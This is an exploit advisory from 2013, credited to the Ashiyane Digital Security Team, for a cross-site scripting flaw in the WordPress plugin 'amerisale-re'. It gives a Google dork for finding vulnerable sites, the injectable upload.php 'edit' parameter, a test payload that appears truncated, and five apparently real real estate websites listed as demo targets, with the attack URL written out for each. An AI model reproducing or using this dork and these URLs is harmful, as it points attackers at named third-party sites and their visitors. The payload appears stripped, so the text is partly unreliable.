#******************************************************************** # Exploit Title : Wordpress amerisale-re plugin Cross site scripting # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://wordpress.org # # Google Dork : inurl :wp-content/plugins/amerisale-re # # Date: 2013-11-26 # # Tested on: Windows 7 , Linux ####################### # Exploit : Cross site scripting # # Location : [Target]wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=[xss] # # Script For Test : "/> ###################### # Demo: # # http://bexleyproperties.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/> # # http://c21lynch.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/> # # http://garrybrownrealestate.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/> # # http://lexingtontexasrealestate.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/> # # http://pudowensrealty.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit= "/> # ###################### discovered by : ACC3SS ######################